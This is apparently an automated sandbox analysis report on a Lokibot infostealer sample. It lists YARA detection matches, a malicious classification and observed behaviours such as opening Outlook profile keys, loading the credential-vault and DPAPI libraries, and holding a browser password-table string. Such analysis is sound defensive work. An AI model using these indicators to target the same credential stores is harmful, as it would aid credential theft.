                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@0/1
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, 00000000.00000003.1683916411.0000000000655000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeReversingLabs: Detection: 97%
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTR
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeStatic PE information: section name: .x
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
